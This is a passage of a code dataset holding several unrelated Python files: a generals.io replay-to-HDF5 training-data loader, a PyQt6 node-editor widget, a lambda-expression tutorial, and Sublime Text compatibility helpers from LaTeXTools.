replay_inputs = [[], []]\n replay_targets = [[], []]\n last_moves = [None, None]\n \n moves_count = len(moves)\n move_index = 0\n print(\"Beginning simulation...\")\n while not game.is_over():\n if move_index >= moves_count:\n break\n # Generate the current game state from the perspective of player with target_id index\n target_moves = [None, None]\n map_states = [game.generate_state(0), game.generate_state(1)]\n map_oracle_states = [game.generate_state(0, True), game.generate_state(1, True)]\n \n # Submit all moves and simulate the game state from replay\n while move_index < moves_count and moves[move_index]['turn'] <= game.turn:\n move = moves[move_index]\n move_index += 1\n player = move['index']\n start = move['start']\n end = move['end']\n is50 = move['is50']\n success = game.handle_attack(player, start, end, is50)\n target_moves[player] = move\n \n # Kill and remove AFK players from the game simulation\n if len(afks) > 0 and afks[0]['turn'] == game.turn:\n game.kill_player(afks[0]['index'])\n \n # Add the state to training data if warranted\n for i in range(2):\n enemy = 0 if i == 1 else 1\n \n target_move = target_moves[i]\n \n # Initialize and update oracle state\n oracle_tiles, oracle_armies, oracle_cities, oracle_generals = map_oracle_states[i]\n oracle_tiles = oracle_tiles.reshape(map_height, map_width)\n oracle_armies = oracle_armies.reshape(map_height, map_width)\n enemy_stats = (np.sum(oracle_armies[oracle_tiles == enemy]), np.sum(oracle_tiles == enemy))\n player_stats = (np.sum(oracle_armies[oracle_tiles == i]), np.sum(oracle_tiles == i))\n #prev_state = np.copy(game_states[i])\n oracle_states[i] = update_state(oracle_states[i], game.turn, oracle_tiles, oracle_armies, oracle_cities, oracle_generals, 
i, enemy, player_stats, enemy_stats, last_moves[i])\n current_oracle_state = np.copy(oracle_states[i])\n \n # Initialize and update regular game state\n tiles, armies, cities, generals = map_states[i]\n tiles = tiles.reshape(map_height, map_width)\n armies = armies.reshape(map_height, map_width)\n prev_state = np.copy(game_states[i])\n game_states[i] = update_state(game_states[i], game.turn, tiles, armies, cities, generals, i, enemy, player_stats, enemy_stats, last_moves[i])\n current_state = np.copy(game_states[i])\n \n # Skip turns that don't have a move or are randomly filtered out\n if target_move is None:\n continue\n \n # Generate the memory efficient position and direction targets\n target = generate_target_move(game, target_move)\n \n # Store the last move made by this player\n y, x, direction, height, width, winner, turn = target\n last_moves[i] = generate_target_tensors(x, y, direction)\n \n if np.random.binomial(1, 0.1):\n continue\n \n # Add the oracle target\n oracle_target = current_oracle_state[:, :, (0,1,2,3,4,5,6,10)].flatten()\n final_target = target#np.concatenate((target, oracle_target), axis=0)\n \n # Add the final state input and target to the lists\n replay_inputs[i].append(current_state)\n replay_targets[i].append(np.copy(final_target))\n \n # Update the game and proceed to the next turn\n game.update()\n \n print(\"Ending simulation with winner {} after {} turns...\".format(game.winner(), game.turn))\n game_winner = game.winner()\n \n # Check to make sure no failed games with no winner\n if game_winner is None:\n for i in range(25): \n print('ERROR! ENDED GAME WITH NO WINNER!!!!! SKIPPING')\n continue\n \n print(\"Sampled \", (len(replay_inputs[0]) + len(replay_inputs[1])))\n # replay_input should be shape (N, 22, 22, 11) for N sampled states\n # replay_target should be shape (N, ((22, 22), (5), (1)))\n # Each sampled N state has a target, which is a:\n # 22x22 categorical prediction of the tile that moved\n # A 5-element vector denoting the direction of the movement (or still)\n # A 1-element binary vector denoting whether the movement was a 50% army move or not\n # A single target should be (tilePosition, moveDirection, is50Move)\n \n # Randomly determine whether this game will be validation or training\n dataset_name = \"validation\" if np.random.binomial(1, validation_ratio) else \"training\"\n \n # Add the sample states and targets to the thread-safe queue\n for player_id in [0, 1]:\n if (replay['stars'][player_id] < MIN_REPLAY_STARS):# or replay['usernames'][player_id] != \"Dept of Defense\"):\n continue\n target_length = len(replay_targets[player_id][0])\n \n inputs = np.concatenate(replay_inputs[player_id],axis=0).reshape(-1, ORIGINAL_MAP_WIDTH, ORIGINAL_MAP_WIDTH, MAP_CHANNELS).astype(np.float32)\n targets = np.concatenate(replay_targets[player_id],axis=0).reshape(-1, target_length).astype(np.float32)\n \n # Set whether the player won or not in their targets\n targets[:,5] = 1 if player_id == game_winner else -1\n # Set how many turns were remaining in the game from this move onward\n targets[:, 6] = game.turn - targets[:, 6] - 1\n \n replay_inputs[player_id] = inputs\n replay_targets[player_id] = targets\n \n # Add the collected sample frames to our disk collection\n lock.acquire()\n #data_input.put(replay_inputs[player_id].astype(np.float32))\n #data_target.put(replay_targets[player_id].astype(np.float32))\n add_to_dataset(file_name, dataset_name, replay_inputs[player_id], replay_targets[player_id])\n lock.release()\n except:\n e = sys.exc_info()[0]\n 
print(e)\n print(traceback.format_exc())\n print(\"----------------------ERROR DURING LOAD! Skipping...\")\n pass\n print(\"Thread {} is finished loading!\".format(threadId))\n return 0\n\ndef fetch_replay_names(replayFolder, gamesToFetch, required_players=None):\n replayDirectory = os.listdir(replayFolder)\n random.shuffle(list(replayDirectory))\n replayNames = []\n for replay in replayDirectory:\n if len(replayNames) > gamesToFetch*2:\n break\n if replay[-10:] == '.gioreplay':\n if required_players is not None:\n #print(\"Load \", replay, \" out of \", len(replayNames), \" with a total of \", len(replayDirectory))\n replay_file = load_replay(replayFolder, replay)\n if len(replay_file['usernames']) != required_players:\n continue\n replayNames.append(replay)\n replayIndices = np.random.choice(np.arange(len(replayNames)), size=min(len(replayNames), gamesToFetch), replace=False)\n replayNames = np.array(replayNames)[replayIndices]\n \n return replayNames\n\n# Example usage: Sample 64 frames randomly from the training dataset of the FlobotFrames.h5 file\n# X, y = sample_dataset(\"FlobotFrames\", \"training\", 64)\ndef sample_dataset(file_name, dataset_name=\"training\", sample_size = 64, sample_indices=None, data_folder='./data'):\n file_name = '{}/{}.h5'.format(data_folder, file_name)\n \n with h5py.File(file_name, 'r') as h5f:\n X_data = h5f[\"{}_input\".format(dataset_name)]\n y_data = h5f[\"{}_target\".format(dataset_name)] \n \n if sample_indices is None:\n n = X_data.shape[0]\n sample_size = min(sample_size, n)\n sample_indices = np.random.choice(np.arange(n), size=sample_size, replace=False)\n \n X, y = X_data[sample_indices], y_data[sample_indices]\n #X, y = X_data[10204:sample_size+10204], y_data[0:sample_size]\n \n return np.copy(X), np.copy(y)\n\ndef _dataset_exists(file_path, dataset_name, data_folder='./data'):\n if not os.path.isfile(file_path):\n return False\n \n with h5py.File(file_path, 'a') as h5f:\n exists = (dataset_name in h5f)\n \n return exists\n\ndef copy_dataset(old_file_name, new_file_name, data_folder='./data', chunk_size=5000):\n oldFile = h5py.File('{}/{}.h5'.format(data_folder, old_file_name), 'a')\n newFile = h5py.File('{}/{}.h5'.format(data_folder, new_file_name), 'w')\n \n for dataset_name in ['validation', 'training']:\n for data_type in ['target', 'input']:\n data_name = '{}_{}'.format(dataset_name, data_type)\n dataset = newFile.create_dataset(data_name, oldFile[data_name].shape, chunks=None)\n n = oldFile[data_name].shape[0]\n i = n\n while i > 0:\n start = max(0, i - chunk_size)\n dataset[start:i] = oldFile[data_name][start:i]\n oldFile[data_name].resize(start, axis=0)\n print(i, start, oldFile[data_name].shape, data_name)\n i = start\n print(\"Completed transfer for \", data_name, \" so deleting now...\")\n del oldFile[data_name]\n oldFile.close()\n oldFile = h5py.File('{}/{}.h5'.format(data_folder, old_file_name), 'a')\n \n oldFile.close()\n newFile.close()\n \ndef get_dataset_info(file_name, dataset_name, data_folder='./data'):\n file_path = '{}/{}.h5'.format(data_folder, file_name)\n with h5py.File(file_path, 'a') as h5f:\n #print(\"Fetching info for \", file_name, \" \", file_path, dataset_name)\n X_shape = h5f[\"{}_input\".format(dataset_name)].shape\n y_shape = h5f[\"{}_target\".format(dataset_name)].shape\n \n return X_shape, y_shape\n \n# Example: Add some newly collected training input and target frames to dataset\n# add_to_dataset(\"FlobotFrames\", \"training\", input_samples, target_samples)\ndef add_to_dataset(file_name, dataset_name, X, y, 
data_folder='./data'):\n file_path = '{}/{}.h5'.format(data_folder, file_name)\n #print(\"Adding to file path \", file_path, \" with dataset name\", dataset_name)\n \n if not _dataset_exists(file_path, \"{}_input\".format(dataset_name), data_folder):\n _initialize_dataset(file_path, \"{}_target\".format(dataset_name), y, data_folder)\n _initialize_dataset(file_path, \"{}_input\".format(dataset_name), X, data_folder)\n else:\n _add_samples_to_dataset(file_path, \"{}_input\".format(dataset_name), X, data_folder)\n _add_samples_to_dataset(file_path, \"{}_target\".format(dataset_name), y, data_folder)\n\n\ndef _initialize_dataset(file_path, dataset_name, data, data_folder='./data'):\n with h5py.File(file_path, 'a') as h5f:\n max_dataset_shape = list(data.shape)\n max_dataset_shape[0] = None\n max_dataset_shape = tuple(max_dataset_shape)\n dataset = h5f.create_dataset(dataset_name, data.shape, maxshape=max_dataset_shape)\n dataset[:] = np.copy(data)\n #print(\"initializing! \", max_dataset_shape, data.shape, dataset_name, h5f[dataset_name].shape)\n\ndef _add_samples_to_dataset(file_path, dataset_name, data, data_folder='./data'):\n with h5py.File(file_path, 'a') as h5f:\n dataset = h5f[dataset_name]\n n = dataset.shape[0]\n new_n = n + data.shape[0]\n dataset.resize(new_n, axis=0)\n dataset[n:] = data\n #print(\"Old n \", n, \" versus new n\", new_n)\n\ndef load_all_replays(file_name, replayFolder, gamesToLoad, threadCount=8): \n manager = multiprocessing.Manager()\n THREADCOUNT = threadCount\n replaySubsets = [[] for thread in range(THREADCOUNT)]\n replayNames = fetch_replay_names(replayFolder, gamesToLoad, 2)\n replay_count = len(replayNames)\n for index, replay_name in enumerate(replayNames):\n replaySubsets[index % THREADCOUNT].append((index, replay_name))\n \n print(\"Generating training data...\")\n start_time = time.time()\n threads = []\n lock = multiprocessing.Lock()\n for threadId in range(THREADCOUNT):\n threadArgs = (threadId, replayFolder, replaySubsets[threadId], file_name, lock, 0.1)\n thread = multiprocessing.Process(target=load_replays, args = threadArgs) \n thread.daemon = True\n threads.append(thread)\n thread.start()\n \n for threadId in range(THREADCOUNT):\n print(\"Joining on replay loading thread {}\".format(threadId))\n threads[threadId].join()\n \n load_duration = time.time() - start_time\n print(\"Finished loading {} games in {} seconds!\".format(replay_count, load_duration))\n training_input_shape, training_target_shape = get_dataset_info(file_name, \"training\")\n validation_input_shape, validation_target_shape = get_dataset_info(file_name, \"validation\")\n print(\"Training data shapes: \", training_input_shape, training_target_shape)\n print(\"Validation data shapes: \", validation_input_shape, validation_target_shape)\n\nif __name__ == \"__main__\":\n if len(sys.argv) >= 5:\n USER_ID = int(sys.argv[1])\n REPLAY_FOLDER = sys.argv[2]\n REPLAY_LIMIT = int(sys.argv[3])\n THREAD_COUNT = int(sys.argv[4])\n X, y = load_all_replays(\"./replays\", 5, 1)\n print(X.shape)\n print(y.shape)\n","repo_name":"TySayers/generals-io-bot","sub_path":"LoadReplayData.py","file_name":"LoadReplayData.py","file_ext":"py","file_size_in_byte":18871,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"} +{"seq_id":"17583957336","text":"# -*- coding: utf-8 -*-\nimport os\nimport json\n\nfrom PyQt6.QtGui import *\nfrom PyQt6.QtCore import *\nfrom PyQt6.QtWidgets import *\n\nfrom qdstatescene import *\nfrom qdstateconfg import QD_StateConfg\nfrom 
qddraglistbox import QD_DragListBox\nfrom qdopnode import *\nfrom qdedge import *\nfrom qdviewgfx import MODE_EDGE_DRAG, QD_ViewGfx # , MODE_EDGES_REROUTING\nfrom qdutils import *\n\n\nclass QD_StateWidget(utils.disableAutoDelete(QSplitter)):\n    Scene_class = QD_StateScene\n\n\n    def __init__(self, node: 'QD_StateNode' = None, parent: QWidget = None):\n        super().__init__(parent)\n\n        self.node = node\n        self.filename = None\n\n        self.initUI()\n\n        self.setAttribute(Qt.WidgetAttribute.WA_DeleteOnClose)\n\n        self.setTitle()\n        self.initNewNodeActions()\n\n        self.scene.addHasBeenModifiedListener(self.setTitle)\n        self.scene.history.addHistoryRestoredListener(self.onHistoryRestored)\n        self.scene.addDragEnterListener(self.onDragEnter)\n        self.scene.addDropListener(self.onDrop)\n        self.scene.setNodeClassSelector(self.getNodeClassFromData)\n\n        self.__closeEventListeners = []\n\n\n    def initUI(self):\n        self.confg = QD_StateConfg()\n        self.addWidget(self.confg.gfx)\n\n        self.scene = self.__class__.Scene_class()\n        self.view = QD_ViewGfx(self.scene.gfx)\n        self.addWidget(self.view)\n\n        self.draglist = QD_DragListBox()\n        self.draglist.setMaximumWidth(200)\n        self.addWidget(self.draglist)\n\n        self.setSizes([200, 800, 200])\n\n\n    def getNodeClassFromData(self, data):\n        if 'op_code' not in data:\n            return QD_OpNode\n        return utils.getOpNodeType(data['op_code'])\n\n    def doEvalOutputs(self):\n        # eval all output nodes\n        for node in self.scene.nodes:\n            if node.__class__.__name__ == \"CalcNode_Output\":\n                node.eval()\n\n    def onHistoryRestored(self):\n        self.doEvalOutputs()\n\n\n    def fileNew(self):\n        self.scene.clear()\n        self.filename = None\n        self.scene.history.clear()\n        self.scene.history.storeInitialHistoryStamp()\n\n\n    def fileLoad(self, filename: str):\n        QApplication.setOverrideCursor(Qt.CursorShape.WaitCursor)\n        try:\n            with open(filename, \"r\", encoding='utf-8') as f:\n                data = json.load(f)\n\n            if data['version'] != confg.APP_VERSION:\n                QMessageBox.warning(self, \"Incompatible json file version: %s\" % data['version'], \"Current version is %s\" % confg.APP_VERSION)\n                return False\n\n            self.confg.deserialize(data['confg'])\n            self.scene.deserialize(data['scene'])\n\n            self.scene.has_been_modified = False\n            self.scene.history.clear()\n            self.scene.history.storeInitialHistoryStamp()\n\n            self.filename = filename\n\n            self.doEvalOutputs()\n            return True\n\n        except json.JSONDecodeError as e:\n            # the more specific handler must come before the generic one, or it is unreachable\n            QMessageBox.warning(self, \"Invalid json file: %s\" % filename, str(e))\n            return False\n\n        except Exception as e:\n            QMessageBox.warning(self, \"Error loading json file: %s\" % filename, str(e))\n            return False\n\n        finally:\n            QApplication.restoreOverrideCursor()\n\n\n    def fileSave(self, filename: str = None):\n        if filename is not None:\n            self.filename = filename\n\n        QApplication.setOverrideCursor(Qt.CursorShape.WaitCursor)\n\n        with open(self.filename, \"w\", encoding='utf-8', newline='\\n') as f:\n            json.dump(self.serialize(), f, ensure_ascii=False, indent=4)\n            print('saving to %s was successful.' 
% self.filename)\n self.scene.has_been_modified = False\n\n QApplication.restoreOverrideCursor()\n return True\n\n\n def initNewNodeActions(self):\n self.node_actions = {}\n for node in utils.getOpNodeTypes():\n self.node_actions[node.op_code] = QAction(QIcon(node.icon), node.opTitle)\n self.node_actions[node.op_code].setData(node.op_code)\n\n def createNodesContextMenu(self):\n context_menu = QMenu(self)\n for type in utils.getOpNodeTypes():\n context_menu.addAction(self.node_actions[type.op_code])\n return context_menu\n\n def onAttrTimeoutEditingFinished(self):\n if self._attr_timeout_edit.text():\n if int(self._attr_timeout_edit.text()) < 0:\n self._attr_timeout_edit.setText(\"无限制\")\n\n\n def isModified(self) -> bool:\n return self.scene.isModified()\n\n\n def isFilenameSet(self) -> bool:\n return self.filename is not None\n\n\n def getSelectedItems(self) -> list:\n return self.scene.getSelectedItems()\n\n def hasSelectedItems(self) -> bool:\n return self.getSelectedItems() != []\n\n\n def canUndo(self) -> bool:\n return self.scene.history.canUndo()\n\n\n def canRedo(self) -> bool:\n return self.scene.history.canRedo()\n\n def getUserFriendlyFilename(self) -> str:\n name = os.path.basename(self.filename) if self.isFilenameSet() else \"New State\"\n return name + (\"*\" if self.isModified() else \"\")\n\n\n def setTitle(self):\n self.setWindowTitle(self.getUserFriendlyFilename())\n\n def addCloseEventListener(self, callback):\n self.__closeEventListeners.append(callback)\n\n def closeEvent(self, event):\n for callback in self.__closeEventListeners:\n callback(self, event)\n\n def onDragEnter(self, event):\n if event.mimeData().hasFormat(LISTBOX_MIMETYPE):\n event.acceptProposedAction()\n else:\n # print(\" ... denied drag enter event\")\n event.setAccepted(False)\n\n def onDrop(self, event):\n if event.mimeData().hasFormat(LISTBOX_MIMETYPE):\n eventData = event.mimeData().data(LISTBOX_MIMETYPE)\n dataStream = QDataStream(eventData, QIODevice.OpenModeFlag.ReadOnly)\n pixmap = QPixmap()\n dataStream >> pixmap\n op_code = dataStream.readInt()\n text = dataStream.readQString()\n\n mouse_position = event.position()\n scene_position = self.scene.gfx.views()[0].mapToScene(round(mouse_position.x()), round(mouse_position.y()))\n\n if confg.DEBUG:\n print(\"GOT DROP: [%d] '%s'\" % (op_code, text), \"mouse:\", mouse_position, \"scene:\", scene_position)\n\n try:\n node = utils.getOpNodeType(op_code)(self.scene)\n node.setPos(scene_position.x(), scene_position.y())\n self.scene.history.storeHistory(\"Created node %s\" % node.__class__.__name__)\n except Exception as e:\n utils.dumpExcept(e)\n\n event.setDropAction(Qt.DropAction.MoveAction)\n event.accept()\n else:\n # print(\" ... 
drop ignored, not requested format '%s'\" % LISTBOX_MIMETYPE)\n event.ignore()\n\n def contextMenuEvent(self, event):\n try:\n item = self.scene.getItemAt(event.pos() - self.view.pos())\n if confg.DEBUG:\n print(item)\n\n if type(item) == QGraphicsProxyWidget:\n item = item.widget()\n\n if hasattr(item, 'node') or hasattr(item, 'socket'):\n self.handleNodeContextMenu(event)\n elif hasattr(item, 'edge'):\n self.handleEdgeContextMenu(event)\n # elif item is None:\n else:\n self.handleNewNodeContextMenu(event)\n\n return super().contextMenuEvent(event)\n except Exception as e:\n utils.dumpExcept(e)\n\n def handleNodeContextMenu(self, event):\n if confg.DEBUG:\n print(\"CONTEXT: NODE\")\n context_menu = QMenu(self)\n markDirtyAct = context_menu.addAction(\"Mark Dirty\")\n markDirtyDescendantsAct = context_menu.addAction(\"Mark Descendant Dirty\")\n markInvalidAct = context_menu.addAction(\"Mark Invalid\")\n unmarkInvalidAct = context_menu.addAction(\"Unmark Invalid\")\n evalAct = context_menu.addAction(\"Eval\")\n\n addNodeMenu = context_menu.addMenu('Add Node')\n addedActDict = {}\n for type in utils.getOpNodeTypes():\n addedActDict[addNodeMenu.addAction(type.opTitle)] = type\n\n action = context_menu.exec(self.mapToGlobal(event.pos()))\n if action is None:\n return\n\n selected = None\n item = self.scene.getItemAt(event.pos() - self.view.pos())\n\n if isinstance(item, QGraphicsProxyWidget):\n item = item.widget()\n\n if hasattr(item, 'node'):\n selected = item.node\n\n if hasattr(item, 'socket'):\n selected = item.socket.node\n\n if confg.DEBUG:\n print(\"got item:\", selected)\n\n if selected:\n if action == markDirtyAct:\n selected.markDirty()\n\n elif action == markDirtyDescendantsAct:\n selected.markDescendantsDirty()\n\n elif action == markInvalidAct:\n selected.markInvalid()\n\n elif action == unmarkInvalidAct:\n selected.markInvalid(False)\n\n elif action == evalAct:\n val = selected.eval()\n if confg.DEBUG:\n print(\"EVALUATED:\", val)\n\n else:\n for addedAct in addedActDict.keys():\n if action == addedAct:\n print(\"ADDING NODE: %s\" % addedActDict[addedAct].opTitle)\n selected.addSubNode(addedActDict[addedAct])\n break\n\n\n def handleEdgeContextMenu(self, event):\n if confg.DEBUG:\n print(\"CONTEXT: EDGE\")\n context_menu = QMenu(self)\n bezierAct = context_menu.addAction(\"Bezier QD_Edge\")\n directAct = context_menu.addAction(\"Direct QD_Edge\")\n action = context_menu.exec(self.mapToGlobal(event.pos()))\n\n selected = None\n item = self.scene.getItemAt(event.pos())\n if hasattr(item, 'edge'):\n selected = item.edge\n\n if selected and action == bezierAct: selected.edge_type = EdgeType.Bezier\n if selected and action == directAct: selected.edge_type = EdgeType.Direct\n\n # helper functions\n def determine_target_socket_of_node(self, was_dragged_flag, new_calc_node):\n target_socket = None\n if was_dragged_flag:\n if new_calc_node.getSocket(SockType.In):\n target_socket = new_calc_node.getSocket(SockType.In)\n else:\n if new_calc_node.getSocket(SockType.Out_1):\n target_socket = new_calc_node.getSocket(SockType.Out_1)\n elif new_calc_node.getSocket(SockType.Out_0):\n target_socket = new_calc_node.getSocket(SockType.Out_0)\n return target_socket\n\n def finish_new_node_state(self, new_calc_node):\n self.scene.doDeselectItems()\n new_calc_node.gfx.doSelect(True)\n new_calc_node.gfx.onSelected()\n\n def handleNewNodeContextMenu(self, event):\n if confg.DEBUG:\n print(\"CONTEXT: EMPTY SPACE\")\n\n context_menu = self.createNodesContextMenu()\n action = 
context_menu.exec(self.mapToGlobal(event.pos()))\n\n if action is not None:\n new_calc_node = utils.getOpNodeType(action.data())(self.scene)\n scene_pos = self.scene.getView().mapToScene(event.pos() - self.view.pos())\n new_calc_node.setPos(scene_pos.x(), scene_pos.y())\n if confg.DEBUG:\n print(\"Selected node:\", new_calc_node)\n\n if self.scene.getView().mode == MODE_EDGE_DRAG:\n # if we were dragging an edge...\n target_socket = self.determine_target_socket_of_node(self.scene.getView().dragStartSocket.is_output, new_calc_node)\n if target_socket is not None:\n self.scene.getView().edgeDragEnd(target_socket.gfx)\n self.finish_new_node_state(new_calc_node)\n\n else:\n self.scene.history.storeHistory(\"Created %s\" % new_calc_node.__class__.__name__)\n\n\n def addNodes(self):\n node1 = QD_OpNode(self.scene, \"My Awesome QD_OpNode 1\", sockets={SocketType.In, SocketType.Out_True, SocketType.Out_False})\n node2 = QD_OpNode(self.scene, \"My Awesome QD_OpNode 2\", sockets={SocketType.In, SocketType.Out_True, SocketType.Out_False})\n node3 = QD_OpNode(self.scene, \"My Awesome QD_OpNode 3\", sockets={SocketType.In, SocketType.Out_True, SocketType.Out_False})\n node1.setPos(-350, -250)\n node2.setPos(-75, 0)\n node3.setPos(200, -200)\n\n edge1 = QD_Edge(self.scene, node1.getSocket(SocketType.Out_True), node2.getSocket(SocketType.In), edge_type=EdgeType.Bezier)\n edge2 = QD_Edge(self.scene, node2.getSocket(SocketType.Out_True), node3.getSocket(SocketType.In), edge_type=EdgeType.Bezier)\n edge3 = QD_Edge(self.scene, node1.getSocket(SocketType.Out_True), node3.getSocket(SocketType.In), edge_type=EdgeType.Bezier)\n\n self.scene.history.storeInitialHistoryStamp()\n\n\n def addCustomNode(self):\n from qdopnodecontent import QD_OpNodeContent\n from qdserializable import QD_Serializable\n\n class NNodeContent(QLabel): # , QD_Serializable):\n def __init__(self, node, parent=None):\n super().__init__(\"FooBar\")\n self.node = node\n self.setParent(parent)\n\n class NNode(QD_OpNode):\n NodeContent_class = NNodeContent\n\n self.scene.setNodeClassSelector(lambda data: NNode)\n node = NNode(self.scene, \"A Custom QD_OpNode 1\", sockets={SocketType.In, SocketType.Out_True, SocketType.Out_False})\n\n print(\"node content:\", node.content)\n\n\n def serialize(self) -> dict:\n return {'version': confg.APP_VERSION, 'confg': self.confg.serialize(), 'scene': self.scene.serialize()}\n\n\n def addDebugContent(self):\n greenBrush = QBrush(Qt.green)\n outlinePen = QPen(Qt.black)\n outlinePen.setWidth(2)\n\n rect = self.gfx.addRect(-100, -100, 80, 100, outlinePen, greenBrush)\n rect.setFlag(QGraphicsItem.ItemIsMovable)\n\n text = self.gfx.addText(\"This is my Awesome text!\", QFont(\"Ubuntu\"))\n text.setFlag(QGraphicsItem.ItemIsSelectable)\n text.setFlag(QGraphicsItem.ItemIsMovable)\n text.setDefaultTextColor(QColor.fromRgbF(1.0, 1.0, 1.0))\n\n widget1 = QPushButton(\"Hello World\")\n proxy1 = self.gfx.addWidget(widget1)\n proxy1.setFlag(QGraphicsItem.ItemIsMovable)\n proxy1.setPos(0, 30)\n\n widget2 = QTextEdit()\n proxy2 = self.gfx.addWidget(widget2)\n proxy2.setFlag(QGraphicsItem.ItemIsSelectable)\n proxy2.setPos(0, 60)\n\n line = self.gfx.addLine(-200, -200, 400, -100, outlinePen)\n line.setFlag(QGraphicsItem.ItemIsMovable)\n 
line.setFlag(QGraphicsItem.ItemIsSelectable)\n","repo_name":"etorth/pyqt-node-editor-core","sub_path":"src/qdstatewidget.py","file_name":"qdstatewidget.py","file_ext":"py","file_size_in_byte":14920,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"43265640199","text":"\"\"\"\n    lambda expressions\n    anonymous functions\n    syntax:\n        lambda parameters: body\n        (no return statement is written in the body)\n\"\"\"\n\n# def func01(a, b):\n#     return a > b\n#\n#\n# print(func01(10, 20))\n\n# Syntax: replace def with lambda -- keep the parameters but not the parentheses, keep the colon, drop return, keep the body. The result is equivalent to the function above.\n# 1. Parameters and a return value\nfunc01 = lambda a, b: a > b  # receive the lambda with a variable\nprint(func01(10, 20))  # just pass the arguments when calling\n\n# 2. No parameters, a return value\n# def func02():\n#     return \"ok\"\n#\n# print(func02())\n\nfunc02 = lambda: \"ok\"\nprint(func02())\n\n\n# 3. No parameters, no return value\ndef func03():\n    print(\"ok\")\n\n\nfunc03()\n\nfunc03 = lambda: print(\"ok\")\nfunc03()\n\n\n# 4. Parameters, no return value\ndef func04(a):\n    print(a)\n\n\nfunc04(100)\nfunc04 = lambda a: print(a)\nfunc04(100)\n\n\n# 5. lambda does not support assignment statements\ndef func05(iterable):\n    iterable[0] = 100\n\n\nlist01 = [1]\nfunc05(list01)\nprint(list01)\n\n\n# func05 = lambda iterable:iterable[0] = 100\n\n# 6. lambda does not support multiple statements\ndef func06(a, b):\n    print(a)\n    print(b)\n\n\nfunc06(10, 20)\n# func06 = lambda a, b: print(a) print(b)\n","repo_name":"fenglinhuoshan-xun/pythonLearning","sub_path":"stage1/PYTHON_ADVANCED/day03 函数式编程/demo01.py","file_name":"demo01.py","file_ext":"py","file_size_in_byte":1146,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"21"}
{"seq_id":"73027152693","text":"# This module provides some functions that handle differences between ST2 and\n# ST3. For the most part, they provide ST2-compatible functionality that is\n# already available in ST3.\nfrom __future__ import print_function\n\nimport codecs\nimport json\nimport os\nimport re\nimport sublime\nimport sys\n\ntry:\n    from latextools_utils.external_command import (\n        check_output, external_command\n    )\n    from latextools_utils.settings import get_setting\n    from latextools_utils.system import which\nexcept ImportError:\n    from .external_command import check_output, external_command\n    from .settings import get_setting\n    from .system import which\n\n_ST3 = sublime.version() >= '3000'\n\n\n__all__ = ['normalize_path', 'get_project_file_name']\n\n# used by get_sublime_exe()\nSUBLIME_VERSION = re.compile(r'Build (\\d{4})', re.UNICODE)\n\n\n# normalizes the paths stored in sublime session files on Windows\n# from:\n# \t/c/path/to/file.ext\n# to:\n# \tc:\\path\\to\\file.ext\ndef normalize_path(path):\n    if sublime.platform() == 'windows':\n        return os.path.normpath(\n            path.lstrip('/').replace('/', ':/', 1)\n        )\n    else:\n        return path\n\n\n# returns the focus to ST\n# NB it's probably good to call this as little as possible since focus-stealing\n# annoys people\ndef focus_st():\n    if get_setting('disable_focus_hack', False):\n        return\n\n    sublime_command = get_sublime_exe()\n\n    if sublime_command is not None:\n        platform = sublime.platform()\n        plat_settings = get_setting(platform, {})\n        wait_time = plat_settings.get('keep_focus_delay', 0.5)\n\n        # osx is a special snowflake\n        if platform == 'osx':\n            # sublime_command should be /path/to/Sublime Text.app/Contents/...\n            sublime_app = sublime_command.split('/Contents/')[0]\n\n            def keep_focus():\n                external_command(\n                    [\n                        'osascript', '-e',\n                        'tell application \"{0}\" to activate'.format(\n                            sublime_app\n                        )\n                    ],\n                    use_texpath=False\n                )\n        else:\n            def keep_focus():\n                external_command([sublime_command], 
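# [Editor's aside -- not part of any dataset record] The lambda tutorial above
# stops at "no multiple statements"; the idiomatic home for lambdas is as
# throwaway key/predicate functions, e.g. (Python built-ins only):
#     sorted([(1, 'b'), (2, 'a')], key=lambda p: p[1])   # -> [(2, 'a'), (1, 'b')]
#     list(filter(lambda n: n % 2 == 0, [1, 2, 3, 4]))   # -> [2, 4]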
use_texpath=False)\n\n if hasattr(sublime, 'set_async_timeout'):\n sublime.set_async_timeout(keep_focus, int(wait_time * 1000))\n else:\n sublime.set_timeout(keep_focus, int(wait_time * 1000))\n\n\n# returns the path to the sublime executable\ndef get_sublime_exe():\n '''\n Utility function to get the full path to the currently executing\n Sublime instance.\n '''\n processes = ['subl', 'sublime_text']\n\n def check_processes(st2_dir=None):\n if st2_dir is None or os.path.exists(st2_dir):\n for process in processes:\n try:\n if st2_dir is not None:\n process = os.path.join(st2_dir, process)\n\n m = SUBLIME_VERSION.search(check_output(\n [process, '-v'],\n use_texpath=False\n ))\n if m and m.group(1) == version:\n return process\n except:\n pass\n\n return None\n\n platform = sublime.platform()\n\n plat_settings = get_setting(platform, {})\n sublime_executable = plat_settings.get('sublime_executable', None)\n\n if sublime_executable:\n return sublime_executable\n\n # we cache the results of the other checks, if possible\n if hasattr(get_sublime_exe, 'result'):\n return get_sublime_exe.result\n\n # are we on ST3\n if hasattr(sublime, 'executable_path'):\n get_sublime_exe.result = sublime.executable_path()\n # on osx, the executable does not function the same as subl\n if platform == 'osx':\n get_sublime_exe.result = os.path.normpath(\n os.path.join(\n os.path.dirname(get_sublime_exe.result),\n '..',\n 'SharedSupport',\n 'bin',\n 'subl'\n )\n )\n # on linux, it is preferable to use subl if it points to the\n # correct version see issue #710 for a case where this is useful\n elif (\n platform == 'linux' and\n not get_sublime_exe.result.endswith('subl')\n ):\n subl = which('subl')\n if subl is not None:\n try:\n m = SUBLIME_VERSION.search(check_output(\n [subl, '-v'],\n use_texpath=False\n ))\n\n if m and m.group(1) == sublime.version():\n get_sublime_exe.result = subl\n except:\n pass\n\n return get_sublime_exe.result\n # in ST2 on Windows the Python executable is actually \"sublime_text\"\n elif platform == 'windows' and sys.executable != 'python' and \\\n os.path.isabs(sys.executable):\n get_sublime_exe.result = sys.executable\n return get_sublime_exe.result\n\n # guess-work for ST2\n version = sublime.version()\n\n # hope its on the path\n result = check_processes()\n if result is not None:\n get_sublime_exe.result = result\n return result\n\n # guess the default location\n if platform == 'windows':\n st2_dir = os.path.expandvars('%PROGRAMFILES%\\\\Sublime Text 2')\n result = check_processes(st2_dir)\n if result is not None:\n get_sublime_exe.result = result\n return result\n elif platform == 'linux':\n for path in [\n '$HOME/bin',\n '$HOME/sublime_text_2',\n '$HOME/sublime_text',\n '/opt/sublime_text_2',\n '/opt/sublime_text',\n 